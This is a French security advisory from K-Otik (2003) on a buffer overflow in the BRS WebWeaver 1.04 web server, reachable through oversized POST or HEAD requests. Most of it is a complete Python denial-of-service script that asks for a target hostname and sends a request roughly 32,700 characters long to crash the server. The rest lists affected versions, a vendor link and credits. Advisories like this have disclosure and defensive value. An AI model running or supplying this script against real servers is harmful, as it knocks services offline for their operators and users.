| 
                        
                          | BRS WebWeaver v1.04 POST and HEAD Overflows |   Date de Publication: 2003-05-28Titre: BRS WebWeaver v1.04 POST and HEAD Overflows
 K-Otik ID : 0124
 Exploitable à distance : Oui
 Exploitable en local : Oui
 
 
 * Description Technique - Exploit *
 
 Webweaver souffre d'un buffer overflow lié aux requêtes POST et HEAD. En envoyant une requête de plus de 32700 caractères, ceci provoquera le crash du serveur http.
 
 ---------------------- Exploit ---------------------
 
 #! /usr/bin/env python
 ###
 # WebWeaver 1.04 Http Server DoS exploit
 # by euronymous /f0kp [http://f0kp.iplus.ru]
 ########
 # Usage: ./fadvWWhtdos.py
 ########
 
 import sys
 import httplib
 
 met = raw_input("""
 What kind request you want make to crash webweaver?? [ HEAD/POST ]:
 """)
 target = raw_input("Type your target hostname [ w/o http:// ]: ")
 spl = "f0kp"*0x1FEF
 conn = httplib.HTTPConnection(target)
 conn.request(met, "/"+spl)
 r1 = conn.getresponse()
 print r1.status
 
 ------------------------------------------------------
 
 
 * Versions Vulnérables *
 
 BRS WebWeaver v1.04 et inferieures.
 
 
 * Solution *
 
 http://www.brswebweaver.com
 
 
 * Crédits *
 
 Faille découverte par euronymous (Mai 2003).
 
 
 |